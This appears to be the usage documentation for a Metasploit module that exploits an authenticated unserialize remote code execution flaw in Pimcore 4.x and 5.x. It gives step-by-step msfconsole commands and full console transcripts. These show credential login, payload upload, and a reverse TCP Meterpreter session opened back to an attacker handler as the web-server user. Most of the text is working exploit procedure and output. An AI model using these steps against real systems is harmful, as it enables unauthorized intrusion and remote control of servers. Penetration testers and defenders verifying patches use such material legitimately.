https://github.com/pimcore/pimcore/commit/38a29e2f4f5f060a73974626952501cee05fda73
https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-173998

This module has been tested successfully on Pimcore 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4, 5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0 with the Symfony unserialize payload and on Pimcore 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3, 4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0, 4.0.1, 4.0.0 with the Zend unserialize payload.

## Verification

The steps needed to make sure this thing works:

- [x] Setting up a working installation of Pimcore 4.x or 5.x
- [x] Start `msfconsole`
- [x] `use exploit/multi/http/pimcore_unserialize_rce`
- [x] `set RHOST <IP>`
- [x] `set USERNAME <USERNAME>`
- [x] `set PASSWORD <PASSWORD>`
- [x] `check`
- [x] You should see `The target service is running, but could not be validated.`
- [x] `exploit`
- [x] You should get a meterpreter session!

## Scenario

### Pimcore 5.x
```
msf5 > use exploit/multi/http/pimcore_unserialize_rce 
msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com
rhost => target.com
msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8566
rport => 8566
msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin
username => admin
msf5 exploit(multi/http/pimcore_unserialize_rce) > set password pimcore
password => pimcore
msf5 exploit(multi/http/pimcore_unserialize_rce) > check
[*] 192.168.2.59:8566 - The target service is running, but could not be validated.
msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit

[*] Started reverse TCP handler on 10.0.8.2:4444 
[+] Authentication successful: admin:pimcore
[*] Pimcore version: 5.6.6
[*] Pimcore build: 9722d19576f9e49969d4a3708e045fa481eaad02
[+] The target is vulnerable!
[+] JSON paylod uploaded successful: /var/www/html/var/tmp/bulk-import.tmp
[*] Selected payload: Pimcore 5.x (Symfony unserialize payload)
[*] Sending stage (38247 bytes) to 192.168.2.59
[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:34128) at 2019-04-07 12:04:08 +0200
[!] This exploit may require manual cleanup of '/var/www/html/var/tmp/bulk-import.tmp' on the target

meterpreter > 
[+] Deleted /var/www/html/var/tmp/bulk-import.tmp

meterpreter > getuid
Server username: www-data (33)
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 192.168.2.59 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/pimcore_unserialize_rce) > 
```

### Pimcore 4.x

```
msf5 > use exploit/multi/http/pimcore_unserialize_rce 
msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com
rhost => target.com
msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8465
rport => 8465
msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin
username => admin
msf5 exploit(multi/http/pimcore_unserialize_rce) > set password P1mc0r3_4dm1n
password => P1mc0r3_4dm1n
msf5 exploit(multi/http/pimcore_unserialize_rce) > check
[*] 192.168.2.59:8465 - The target service is running, but could not be validated.
msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit

[*] Started reverse TCP handler on 10.0.8.2:4444 
[+] Authentication successful: admin:P1mc0r3_4dm1n
[*] Pimcore version: 4.6.5
[*] Pimcore build: 4123
[+] The target is vulnerable!
[+] JSON paylod uploaded successful: /var/www/html/website/var/system/bulk-import.tmp
[*] Selected payload: Pimcore 4.x (Zend unserialize payload)
[*] Sending stage (38247 bytes) to 192.168.2.59
[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:57882) at 2019-04-07 12:00:20 +0200
[+] Deleted /var/www/html/website/var/system/bulk-import.tmp

meterpreter > getuid
Server username: www-data (33)
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 192.168.2.59 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/pimcore_unserialize_rce) > 
```

## Testing

1. Setting up a working installation of Pimcore 4.x or 5.x
2. Start `msfconsole`
3. `use exploit/multi/http/pimcore_unserialize_rce`
4. `set RHOST <IP>`
5. `set USERNAME <USERNAME>`
6. `set PASSWORD <PASSWORD>`
7. `check`
8. You should see `The target service is running, but could not be validated.`
9. `exploit`
10. You should get a meterpreter session!